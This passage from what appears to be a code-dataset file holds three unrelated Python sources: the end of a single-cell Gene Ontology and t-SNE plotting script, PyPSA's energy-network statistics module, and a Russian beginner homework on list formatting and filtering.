GO2E : GO ID --> [ENSG IDs]\nGO2E = CI_data['GO2E']\n\n# GO2I : GO ID --> Gene indices in BC data\nGO2I = {\n\tgo : np.asarray([E2I[e] for e in E])\n\tfor (go, E) in GO2E.items()\n}\n\n# GO2T : GO ID --> GO category name\nGO2T = CI_data['GO2T']\n\n# GO2WQ : GO ID --> clustering index windowed quantile\nGO2WQ = CI_data['GO2WQ']\n\n\n## The Gene Ontology graph\n#GO_graph = pickle.load(open(IFILE['GO graph'], 'rb'))\n\n## Are those GO IDs in the GO graph?\n#go_not_in_graph = set(GO2E.keys()) - set(GO_graph.nodes())\n#print(\"Note: {} GO IDs are not in the graph\".format(len(go_not_in_graph)))\n\n\n## =============== PREPROCESS :\n\n#[ Remove repeated GO categories ]#\n\nH2GO = defaultdict(set)\nfor (go, E) in GO2E.items() : H2GO[hash('+'.join(sorted(E)))].add(go)\nH2GO = dict(H2GO)\n#\n# Check for no hash collisions\nassert(all((1 == len(set('+'.join(sorted(GO2E[go])) for go in GO))) for GO in H2GO.values()))\n#\n# Non-redundant GO categories and their aliases\nGO2A = { min(GO) : sorted(GO) for GO in H2GO.values() }\n#\n#print(\"{} of {} GO categories are non-redundant\".format(len(GO2A), len(GO2E)))\nassert(10000 <= len(GO2A) <= 30000), \"Unexpected number of GO terms\"\n#\ndel 
H2GO\n\ndef restrict(GO2X, GO) :\n\treturn { go : x for (go, x) in GO2X.items() if (go in GO) }\n\nGO2E = restrict(GO2E, GO2A.keys())\nGO2I = restrict(GO2I, GO2A.keys())\nGO2CI = restrict(GO2CI, GO2A.keys())\nGO2WQ = restrict(GO2WQ, GO2A.keys())\n\n\n## ===================== WORK :\n\n#[ ]#\n\n\ndef data_in_go_space(N=None, norm_features=True, norm_samples=True) :\n\t\n\t# Move to the GO feature space\n\tassert(axis_gene == 0)\n\tY = goordinate_trafo(sorted(GO2I.items()), n_genes) * X\n\t\n\t# Nontrivial features\n\tY = [(go, x) for (go, x) in zip(sorted(GO2I.keys()), Y.tolist()) if GO2WQ.get(go, None) and np.sum(x)]\n\t# Sort by \"clustering index windowed quantile\"\n\tY = sorted(Y, key=(lambda go_x : GO2WQ[go_x[0]]))\n\t\n\t# Split GO ID / Data \n\t(GO, Y) = zip(*Y)\n\t\n\t# Filter by size\n\t(GO, Y) = zip(*[(go, y) for (go, y) in zip(GO, Y) if (len(GO2E[go]) <= 9)])\n\t\n\t# Take the first N \n\tif N :\n\t\t(GO, Y) = zip(*[(go, y) for (go, y) in list(zip(GO, Y))[0:N]])\n\t\n\t# Collect the features into a numpy matrix row-wise\n\tY = np.vstack(Y)\n\t\n\t# Normalize data feature-wise\n\tif norm_features : \n\t\tY = np.vstack((y / (np.sum(y) or 1)) for y in Y)\n\t\n\t## Normalize data sample-wise\n\t#if norm_samples :\n\t\t#Y = np.vstack((s / (np.sum(s) or 1)) for s in Y.transpose()).transpose()\n\t\n\treturn (GO, Y)\n\n\ndef plot_CI_vs_N() :\n\tpass\n\n\n\ndef compute_all_tSNE_in_go_space() :\n\t\n\truns_filename = IFILE['tsne runs']\n\t\n\tassert(os.path.isfile(runs_filename)), (\"File {} with t-SNE not found.\".format(runs_filename))\n\n\treturn pickle.load(open(runs_filename, 'rb'))['runs']\n\n\ndef plot_tSNE_in_go_space() :\n\t\n\t# Predicted class\n\tYp = pickle.load(open(IFILE['classified'], 'rb'))['Yp']\n\tassert(Yp.shape[0] == n_samples)\n\t\n\tfor run_info in compute_all_tSNE_in_go_space() :\n\t\t\n\t\tZ = run_info['Z']\n\t\tN = run_info['N']\n\t\trun = run_info['run']\n\t\t# run_info['GO']\n\t\n\t\t# Log the selected GO terms to file (including redundancies)\n\t\twith open(OFILE['tsne info'].format(dim=N), 'w') as f :\n\t\t\tfor go in run_info['GO'] :\n\t\t\t\tprint(go, len(GO2E[go]), GO2T[go], \" / \".join([(i + \" -- \" + GO2T[i]) for i in GO2A[go][1:]]), sep='\\t', file=f)\n\t\t\n\t\tcm_a = plt.cm.winter\n\t\tcm_b = plt.cm.cool\n\t\tcm_c = plt.cm.autumn_r\n\t\t\n\t\t# Legend and colors for the tumors\n\t\t(L, c) = zip(*[\n\t\t\t( \"BC01 (ER+)\", cm_a(0.0) ),\n\t\t\t( \"BC02 (ER+)\", cm_a(0.4) ),\n\t\t\t\n\t\t\t( \"BC03 (ER+, HER2+)\", cm_a(0.7) ),\n\t\t\t( \"BC03LN\", cm_a(1.0) ),\n\t\t\t\n\t\t\t( \"BC04 (HER2+)\", cm_b(0.3) ),\n\t\t\t( \"BC05 (HER2+)\", cm_b(0.5) ),\n\t\t\t( \"BC06 (HER2+)\", cm_b(0.9) ),\n\t\t\t\n\t\t\t( \"BC07 (TNBC)\", cm_c(0.0) ),\n\t\t\t( \"BC07LN\", cm_c(0.1) ),\n\t\t\t( \"BC08 (TNBC)\", cm_c(0.3) ),\n\t\t\t( \"BC09 (TNBC)\", cm_c(0.5) ),\n\t\t\t( \"BC09_Re\", cm_c(0.6) ),\n\t\t\t( \"BC10 (TNBC)\", cm_c(0.8) ),\n\t\t\t( \"BC11 (TNBC)\", cm_c(1.0) ),\n\t\t])\n\t\t#\n\t\t# Check that the legend corresponds to the cell groups\n\t\tassert(all((l.startswith(k) for (l, k) in zip(L, sorted(G2S.keys())))))\n\t\t#\n\t\t# The number of samples will be filled in later\n\t\tL = [(\"{} x \" + l) for l in L]\n\t\t\n\t\tplt.close('all')\n\t\t\n\t\t# Clean the axes\n\t\tplt.xticks([], [])#; plt.xlabel(\"t-SNE 1\")\n\t\tplt.yticks([], [])#; plt.ylabel(\"t-SNE 2\")\n\t\t\n\t\t# Handles and texts for the legend\n\t\tHL = []\n\t\t\n\t\tfor background in [True, False] :\n\t\t\t# Iterate over the cell groups\n\t\t\tfor (n, (g, s)) in enumerate(sorted(G2S.items())) 
:\n\t\t\t\t\n\t\t\t\t# NN classification of this sample into this group\n\t\t\t\tsz = 5 + (30 * Yp[s, n])\n\t\t\t\n\t\t\t\tif background :\n\t\t\t\t\t# Scatter plot with no color\n\t\t\t\t\tplt.scatter(*Z[:, s], s=sz, facecolors='None', edgecolors='k', lw=0.1)\n\t\t\t\t\n\t\t\t\telse :\n\t\t\t\t\t# For one particular configuration:\n\t\t\t\t\t# Save intermediate plots showing individual groups better\n\t\t\t\t\tif ( (N, run) == (20, 1) ) :\n\t\t\t\t\t\tfor ext in PARAM['ext'] : \n\t\t\t\t\t\t\tplt.savefig(OFILE['tsne'].format(dim=N, run=run, sub=n, ext=ext))\n\t\t\t\t\t\n\t\t\t\t\t# Keep only the \"healthy\" cells, assuming most cells are healthy\n\t\t\t\t\ts = [c for c in s if (np.mean(X[:, c]) >= np.median(X[:, c])/2)]\n\t\t\t\t\t\n\t\t\t\t\t# Scatter plot of the cell group\n\t\t\t\t\th = plt.scatter(*Z[:, s], alpha=0.8, c=c[n], s=sz, edgecolors='k', lw=0.2)\n\t\t\t\t\t\n\t\t\t\t\t# Fill in the number of samples in the legend\n\t\t\t\t\tHL.append(( h, L[n].format(len(s)) ))\n\t\t\t\t\t\n\t\t\t\t\tplt.legend(*zip(*HL), prop={'size': 5}, loc='upper left')\n\t\t\n\t\tfor ext in PARAM['ext'] : \n\t\t\tplt.savefig(OFILE['tsne'].format(dim=N, run=run, sub=\"all\", ext=ext))\n\n###\n\nif (__name__ == \"__main__\") :\n\tplot_tSNE_in_go_space()\n","sub_path":"p/single-cell/20171130-BCXX/C_goordinates-D.py","file_name":"C_goordinates-D.py","file_ext":"py","file_size_in_byte":10375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272184029","text":"# -*- coding: utf-8 -*-\n\"\"\"\nStatistics Accessor.\n\"\"\"\n\n\n__author__ = (\n \"PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html\"\n)\n__copyright__ = (\n \"Copyright 2015-2023 PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html, \"\n \"MIT License\"\n)\n\nimport logging\nfrom functools import wraps\n\nimport numpy as np\nimport pandas as pd\n\nfrom pypsa.descriptors import nominal_attrs\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_carrier(n, c):\n \"\"\"\n Get the nice carrier names for a component.\n \"\"\"\n df = n.df(c)\n fall_back = pd.Series(\"\", index=df.index)\n return (\n df.get(\"carrier\", fall_back)\n .replace(n.carriers.nice_name[lambda ds: ds != \"\"])\n .replace(\"\", \"-\")\n .rename(\"carrier\")\n )\n\n\ndef get_bus_and_carrier(n, c, port=\"\"):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n if port == \"\":\n if \"bus\" not in n.df(c):\n bus = \"bus0\"\n else:\n bus = \"bus\"\n else:\n bus = f\"bus{port}\"\n return [n.df(c)[bus].rename(\"bus\"), get_carrier(n, c)]\n\n\ndef get_country_and_carrier(n, c, port=\"\"):\n \"\"\"\n Get component country and carrier.\n \"\"\"\n bus = f\"bus{port}\"\n bus, carrier = get_bus_and_carrier(n, c, port)\n country = bus.map(n.buses.country).rename(\"country\")\n return [country, carrier]\n\n\ndef get_carrier_and_bus_carrier(n, c, port=\"\"):\n \"\"\"\n Get component carrier and bus carrier in one combined DataFrame.\n\n Used for MultiIndex in energy balance.\n \"\"\"\n bus = f\"bus{port}\"\n bus_and_carrier = pd.concat(get_bus_and_carrier(n, c, port), axis=1)\n bus_carrier = n.df(c)[bus].map(n.buses.carrier).rename(\"bus_carrier\")\n return pd.concat([bus_and_carrier, bus_carrier], axis=1)\n\n\ndef get_operation(n, c):\n \"\"\"\n Get the operation time series of a component.\n \"\"\"\n if c in n.branch_components:\n return n.pnl(c).p0\n elif c == \"Store\":\n return n.pnl(c).e\n else:\n return n.pnl(c).p\n\n\ndef get_weightings(n, c):\n \"\"\"\n Get 
the relevant snapshot weighting for a component.\n    \"\"\"\n    if c == \"Generator\":\n        return n.snapshot_weightings[\"generators\"]\n    elif c in [\"StorageUnit\", \"Store\"]:\n        return n.snapshot_weightings[\"stores\"]\n    else:\n        return n.snapshot_weightings[\"objective\"]\n\n\ndef aggregate_timeseries(df, weights, agg=\"sum\"):\n    \"Calculate the weighted sum or average of a DataFrame or Series.\"\n    if agg == \"mean\":\n        return df.multiply(weights, axis=0).sum().div(weights.sum())\n    elif agg == \"sum\":\n        return weights @ df\n    elif not agg:\n        return df.T\n    else:\n        return df.agg(agg)\n\n\ndef aggregate_components(n, func, agg=\"sum\", comps=None, groupby=None):\n    \"\"\"\n    Apply a function and group the result for a collection of components.\n    \"\"\"\n    d = {}\n    kwargs = {}\n    if comps is None:\n        comps = n.branch_components | n.one_port_components\n    if groupby is None:\n        groupby = get_carrier\n    for c in comps:\n        if callable(groupby):\n            grouping = groupby(n, c)\n        elif isinstance(groupby, list):\n            grouping = [n.df(c)[key] for key in groupby]\n        elif isinstance(groupby, str):\n            grouping = n.df(c)[groupby]\n        elif isinstance(groupby, dict):\n            grouping = None\n            kwargs = groupby\n        else:\n            raise ValueError(\n                f\"Argument `groupby` must be a function, list, string or dict, got {type(groupby)}\"\n            )\n        d[c] = func(n, c).groupby(grouping, **kwargs).agg(agg)\n    return pd.concat(d)\n\n\ndef pass_empty_series_if_keyerror(func):\n    @wraps(func)\n    def wrapper(*args, **kwargs):\n        try:\n            return func(*args, **kwargs)\n        except (KeyError, AttributeError):\n            return pd.Series([], dtype=float)\n\n    return wrapper\n\n\nclass StatisticsAccessor:\n    \"\"\"\n    Accessor to calculate different statistical values.\n    \"\"\"\n\n    def __init__(self, network):\n        self._parent = network\n\n    def __call__(\n        self,\n        comps=None,\n        aggregate_groups=\"sum\",\n        groupby=get_carrier,\n        **kwargs,\n    ):\n        \"\"\"\n        Calculate statistical values for a network.\n\n        This function calls multiple functions in the background in order to\n        derive a full table of relevant network information. It groups the\n        values within each component according to the groupby argument.\n\n        Parameters\n        ----------\n        comps: list-like\n            Set of components to consider. Defaults to one-port and branch\n            components.\n        aggregate_groups : str, optional\n            Type of aggregation when aggregating component groups. The default is 'sum'.\n        groupby : callable, list, str, optional\n            Specification of how to group assets within one component class.\n            If a function is passed, it should have the arguments network and\n            component name. If a list is passed it should contain\n            column names of the static DataFrame, same for a single string.\n            Defaults to `get_carrier`.\n\n        Returns\n        -------\n        df :\n            pandas.DataFrame with columns giving the different quantities.\n        \"\"\"\n        if \"aggregate_time\" in kwargs:\n            logger.warning(\n                \"Argument 'aggregate_time' ignored in overview table. 
Falling back to individual function defaults.\"\n )\n\n funcs = [\n self.capex,\n self.optimal_capacity,\n self.installed_capacity,\n self.opex,\n self.supply,\n self.withdrawal,\n self.dispatch,\n self.curtailment,\n self.capacity_factor,\n self.revenue,\n self.market_value,\n ]\n kwargs = dict(comps=comps, aggregate_groups=aggregate_groups, groupby=groupby)\n res = []\n for func in funcs:\n df = func(**kwargs)\n res.append(df.rename(df.attrs[\"name\"]))\n return pd.concat(res, axis=1).sort_index(axis=0).sort_index(axis=1)\n\n def get_carrier(self, n, c):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n return get_carrier(n, c)\n\n def get_bus_and_carrier(self, n, c):\n \"\"\"\n Get the buses and nice carrier names for a component.\n \"\"\"\n return get_bus_and_carrier(n, c)\n\n def get_country_and_carrier(self, n, c):\n \"\"\"\n Get the country and nice carrier names for a component.\n \"\"\"\n return get_country_and_carrier(n, c)\n\n def capex(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the capital expenditure of the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c).eval(f\"{nominal_attrs[c]}_opt * capital_cost\")\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Capital Expenditure\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def installed_capex(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the capital expenditure of already built components of the\n network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c).eval(f\"{nominal_attrs[c]} * capital_cost\")\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Capital Expenditure Fixed\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def optimal_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the optimal capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c)[f\"{nominal_attrs[c]}_opt\"]\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Optimal Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def installed_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate the installed capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n return n.df(c)[f\"{nominal_attrs[c]}\"]\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Installed Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def expanded_capacity(self, comps=None, aggregate_groups=\"sum\", groupby=None):\n \"\"\"\n Calculate 
the expanded capacity of the network components in MW.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n \"\"\"\n df = self.optimal_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n ) - self.installed_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Expanded Capacity\"\n df.attrs[\"unit\"] = \"MW\"\n return df\n\n def opex(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the operational expenditure in the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated\n using snapshot weightings. With False the time series is given. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = n.pnl(c).p0\n elif c == \"StorageUnit\":\n p = n.pnl(c).p_dispatch\n else:\n p = n.pnl(c).p\n opex = p * n.get_switchable_as_dense(c, \"marginal_cost\")\n weights = get_weightings(n, c)\n return aggregate_timeseries(opex, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Operational Expenditure\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def supply(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the supply of components in the network. Units depend on the\n regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statitics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -n.pnl(c).p0.clip(upper=0)\n p -= n.pnl(c).p1.clip(upper=0)\n else:\n p = (n.pnl(c).p * n.df(c).sign).clip(lower=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Supply\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def withdrawal(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the withdrawal of components in the network. Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statitics.StatisticsAccessor`.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -(n.pnl(c).p0).clip(lower=0)\n p -= n.pnl(c).p1.clip(lower=0)\n else:\n p = (n.pnl(c).p * n.df(c).sign).clip(upper=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Withdrawal\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def dispatch(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the dispatch of components in the network. 
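# --- Editor's sketch (not part of the dataset entry above) ---------------------
# The supply/withdrawal split used above is just a clip of the signed power
# balance: positive injections count as supply, negative ones as withdrawal,
# and the two parts reproduce the net dispatch. Numbers are invented.
import pandas as pd

p = pd.Series([5.0, -3.0, 0.0])   # signed injection per snapshot, MW
supply = p.clip(lower=0)          # [5.0, 0.0, 0.0]
withdrawal = p.clip(upper=0)      # [0.0, -3.0, 0.0]
assert ((supply + withdrawal) == p).all()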
Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.branch_components:\n p = -n.pnl(c).p0\n else:\n p = n.pnl(c).p * n.df(c).sign\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Dispatch\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def energy_balance(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n aggregate_bus=True,\n ):\n \"\"\"\n Calculate the energy balance of components in the network. Positive\n values represent a supply and negative a withdrawal. Units depend on\n the regarded bus carrier.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Additional parameter\n ----------\n aggregate_bus: bool, optional\n Whether to obtain the nodal or carrier-wise energy balance. Default is True, corresponding to the carrier-wise balance.\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n sign = -1 if c in n.branch_components else n.df(c).get(\"sign\", 1)\n ports = [col[3:] for col in n.df(c).columns if col[:3] == \"bus\"]\n p = list()\n for port in ports:\n mask = n.df(c)[f\"bus{port}\"] != \"\"\n df = sign * n.pnl(c)[f\"p{port}\"].loc[:, mask]\n index = get_carrier_and_bus_carrier(n, c, port=port)[mask]\n df.columns = pd.MultiIndex.from_frame(index.reindex(df.columns))\n p.append(df)\n p = pd.concat(p, axis=1)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n groupby = [\"carrier\", \"bus_carrier\"]\n if not aggregate_bus:\n groupby.append(\"bus\")\n\n df = aggregate_components(\n n,\n func,\n comps=comps,\n agg=aggregate_groups,\n groupby={\"level\": groupby},\n )\n df.attrs[\"name\"] = \"Energy Balance\"\n df.attrs[\"unit\"] = \"carrier dependent\"\n return df\n\n def curtailment(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the curtailment of components in the network in MWh.\n\n The calculation only considers assets with a `p_max_pu` time\n series, which is used to quantify the available power potential.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to MWh\n using snapshot weightings. With False the time series is given in MW. 
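# --- Editor's sketch (not part of the dataset entry above) ---------------------
# Numeric check of the snapshot-weighted aggregation defined earlier in this
# file: agg='sum' computes weights @ df (energy in MWh when df holds power in
# MW and the weights are hours), agg='mean' the weighted average. Toy values.
import pandas as pd

power = pd.DataFrame({"gen1": [10.0, 20.0], "gen2": [5.0, 5.0]})  # MW per snapshot
weights = pd.Series([2.0, 3.0])                                   # hours per snapshot

energy = weights @ power                                            # gen1: 2*10 + 3*20 = 80 MWh
mean_power = power.multiply(weights, axis=0).sum() / weights.sum()  # gen1: 80 / 5 = 16 MW
print(energy, mean_power, sep="\n")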
Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n p = (n.pnl(c).p_max_pu * n.df(c).p_nom_opt - n.pnl(c).p).clip(lower=0)\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Curtailment\"\n df.attrs[\"unit\"] = \"MWh\"\n return df\n\n def capacity_factor(\n self,\n comps=None,\n aggregate_time=\"mean\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the capacity factor of components in the network.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. Defaults to 'mean'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n p = get_operation(n, c).abs()\n weights = get_weightings(n, c)\n return aggregate_timeseries(p, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n capacity = self.optimal_capacity(\n comps=comps, aggregate_groups=aggregate_groups, groupby=groupby\n )\n df = df.div(capacity, axis=0)\n df.attrs[\"name\"] = \"Capacity Factor\"\n df.attrs[\"unit\"] = \"p.u.\"\n return df\n\n def revenue(\n self,\n comps=None,\n aggregate_time=\"sum\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the revenue of components in the network in given currency.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. Defaults to 'sum'.\n \"\"\"\n n = self._parent\n\n @pass_empty_series_if_keyerror\n def func(n, c):\n if c in n.one_port_components:\n prices = n.buses_t.marginal_price.reindex(columns=n.df(c).bus)\n prices.columns = n.df(c).index\n revenue = n.pnl(c).p * prices\n else:\n prices0 = n.buses_t.marginal_price.reindex(columns=n.df(c).bus0)\n prices0.columns = n.df(c).index\n prices1 = n.buses_t.marginal_price.reindex(columns=n.df(c).bus1)\n prices1.columns = n.df(c).index\n revenue = -(n.pnl(c).p0 * prices0 + n.pnl(c).p1 * prices1)\n weights = get_weightings(n, c)\n return aggregate_timeseries(revenue, weights, agg=aggregate_time)\n\n df = aggregate_components(\n n, func, comps=comps, agg=aggregate_groups, groupby=groupby\n )\n df.attrs[\"name\"] = \"Revenue\"\n df.attrs[\"unit\"] = \"currency\"\n return df\n\n def market_value(\n self,\n comps=None,\n aggregate_time=\"mean\",\n aggregate_groups=\"sum\",\n groupby=None,\n ):\n \"\"\"\n Calculate the market value of components in the network in given\n currency/MWh.\n\n For information on the list of arguments, see the docs in\n `Network.statistics` or `pypsa.statistics.StatisticsAccessor`.\n\n Parameters\n ----------\n aggregate_time : str, bool, optional\n Type of aggregation when aggregating time series.\n Note that for {'mean', 'sum'} the time series are aggregated to\n using snapshot weightings. With False the time series is given. 
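# --- Editor's sketch (not part of the dataset entry above) ---------------------
# The two ratio statistics computed in this file, reduced to scalars:
# capacity factor = weighted-mean dispatch / optimal capacity, and market
# value = revenue / dispatched energy. All numbers are invented for the demo.
dispatch_mwh = 80.0   # energy dispatched over the period
hours = 5.0           # sum of snapshot weightings
p_nom_opt = 20.0      # optimal capacity in MW
revenue = 4000.0      # currency earned over the period

capacity_factor = (dispatch_mwh / hours) / p_nom_opt  # 16 MW / 20 MW = 0.8 p.u.
market_value = revenue / dispatch_mwh                 # 50 currency/MWh
print(capacity_factor, market_value)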
Defaults to 'mean'.\n        \"\"\"\n        kwargs = dict(\n            comps=comps,\n            aggregate_time=aggregate_time,\n            aggregate_groups=aggregate_groups,\n            groupby=groupby,\n        )\n        df = self.revenue(**kwargs) / self.dispatch(**kwargs)\n        df.attrs[\"name\"] = \"Market Value\"\n        df.attrs[\"unit\"] = \"currency / MWh\"\n        return df\n","sub_path":"pypsa/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":22431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"438225323","text":"#Murad Munchaev\n# Task 1:\n# A list of fruits is given.\n# Write a program that prints the fruits as a numbered list,\n# right-aligned.\n\n\n# Example:\n# Given: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Output:\n# 1. яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Hint: use the .format() method\n\nfruits = ['APPLE', 'MELON', 'Банан', 'Арбуз', 'Абрикос', 'Апельсин']\nfor num, frut in enumerate (fruits,1):\n    print (str(num) + '. {:>8}'.format(frut))\n\n\n# Task 2:\n# Two arbitrary lists are given.\n# Remove from the first list the elements that are present in the second list and print the result.\nspisok1 = ['Книга', 'Тетрадь', 'Ручка', 'Шар', 'Парта', 'Перо', 'Телефон', 3, -5, 1000]\nspisok2 = ['Книга', 'Шар', 'Парта', 'Телефон', 'Карандаш', -5]\nprint('Первый список: {}'.format(spisok1))\nprint('Второй список: {}'.format(spisok2))\n\nfor el in spisok1[:]:\n    for el2 in spisok2[:]:\n        if el2 == el:\n            spisok1.remove(el2)\nprint('Элементы из первого списка, которых нет во втором: {}'.format(spisok1))\n\n\n# Task 3:\n# An arbitrary list of integers is given.\n# Build a NEW list from the elements of the original one under the following conditions:\n# if an element is divisible by two, divide it by 4; if it is not, multiply it by two,\n# and print the result.\n","sub_path":"lesson_02/home_work/hw02_easy.py","file_name":"hw02_easy.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
